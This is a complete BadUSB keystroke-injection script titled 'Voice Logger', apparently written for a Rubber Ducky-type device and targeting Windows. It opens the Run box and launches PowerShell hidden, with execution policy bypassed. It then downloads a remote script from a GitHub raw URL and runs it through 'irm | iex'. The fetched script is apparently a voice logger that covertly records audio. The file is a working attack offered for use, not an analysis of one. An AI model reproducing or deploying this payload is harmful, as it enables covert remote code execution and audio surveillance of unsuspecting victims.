REM ###########################################################
REM #                                                         |
REM # Title        : Voice Logger                   |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################

GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';irm https://raw.githubusercontent.com/Zenin0/Glipper_Scripts/main/Windows/Executions/VoiceLogger/VL.ps1 | iex
ENTER